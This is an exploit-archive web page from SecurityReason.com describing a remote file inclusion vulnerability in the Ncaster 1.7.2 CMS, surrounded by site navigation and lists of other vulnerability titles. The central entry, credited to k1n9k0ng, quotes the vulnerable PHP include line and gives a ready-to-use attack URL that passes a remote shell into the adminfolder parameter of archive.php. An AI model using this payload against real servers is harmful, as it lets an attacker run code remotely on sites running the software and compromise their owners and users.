SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability


Arrow  ExploitAlert : 2614
Arrow  Credit : k1n9k0ng
Arrow  Date : 09.08.2007

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++
Scripts : Ncaster 1.7.2
Discovered By : k1n9k0ng
Scripts site : http://ncastercms.com/downloads/ncaster172.zip
Thanks To : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code,
#yogyafree
special To : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[
shell]"





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.